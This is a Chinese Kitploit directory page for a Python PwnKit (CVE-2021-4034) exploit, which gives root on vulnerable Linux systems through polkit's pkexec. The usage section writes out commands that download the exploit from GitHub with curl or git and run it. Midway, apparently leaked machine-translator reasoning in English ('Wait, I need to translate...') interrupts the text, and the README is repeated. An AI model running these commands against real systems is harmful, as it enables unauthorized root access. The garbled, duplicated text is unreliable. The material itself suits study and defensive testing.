Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-4034-PwnKit — 针对 PwnKit (CVE-2021-4034) 本地权限提升漏洞的 Python 漏洞利用程序,可通过 polkit 的 pkexec 在易受攻击的 Linux 系统上获取 root shell 访问权限。 | Kitploit
工具/GitHubGitHub/jeffmarlonmandela/cve-2021-4034-pwnkit
权限提升漏洞分析漏洞利用渗透测试红队Repository Deleted
GitHubjeffmarlonmandela/cve-2021-4034-pwnkit

CVE-2021-4034-PwnKit

针对 PwnKit (CVE-2021-4034) 本地权限提升漏洞的 Python 漏洞利用程序,可通过 polkit 的 pkexec 在易受攻击的 Linux 系统上获取 root shell 访问权限。

Kitploit 最近一次更新检查未找到上游仓库。此条目仍保留作参考,但已从搜索结果中移除。
7天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-4034

Este es un exploit en Python Para teniendo una shell, hacer una escalada de privilegios desde x hasta root Funciona atravez de la vulerabilidad CVE-2021-4034 o tambien llamada PwnKit

Wait, I need to translate, not output original. Let's do carefully.

Output:

CVE-2021-4034

Este es un exploit... no. Translate.

The user's target is zh. So output Chinese.

Let's produce:

CVE-2021-4034

这是一个用 Python 编写的漏洞利用程序,用于在拥有一个 shell 的情况下,实现从 x 到 root 的权限提升 它利用的是 CVE-2021-4034 漏洞,也称为 PwnKit

用法:

Curl

[image preserve]

root@kitploit:~
curl -fsSL https://raw.githubusercontent.com/ropydev/CVE-2021-4034-PwnKit/main/main.py -o exploit.py
python3 exploit.py

Git

[image preserve]

root@kitploit:~
git clone https://github.com/ropydev/CVE-2021-4034-PwnKit.git
cd CVE-2021-4034-PwnKit
python main.py

这些示例是在一个带有 reverse shell 的实验室中完成的,这样我们运行该漏洞利用程序,就能轻松提升到 root



这个程序只是原始程序的一个“翻译”或 Python 等价实现,原始程序是用 C 编写的

Need to check markdown: The input images have width height alt src attributes. Preserve exactly.

Let's ensure no extra.# CVE-2021-4034 这是一个用 Python 编写的漏洞利用程序,用于在拥有一个 shell 的情况下,实现从 x 到 root 的权限提升 它利用的是 CVE-2021-4034 漏洞,也称为 PwnKit

用法:

Curl

screenshot
root@kitploit:~
curl -fsSL https://raw.githubusercontent.com/ropydev/CVE-2021-4034-PwnKit/main/main.py -o exploit.py
python3 exploit.py

Git

screenshot
root@kitploit:~
git clone https://github.com/ropydev/CVE-2021-4034-PwnKit.git
cd CVE-2021-4034-PwnKit
python main.py

这些示例是在一个带有 reverse shell 的实验室中完成的,这样我们运行该漏洞利用程序,就能轻松提升到 root



这个程序只是原始程序的一个“翻译”或 Python 等价实现,原始程序是用 C 编写的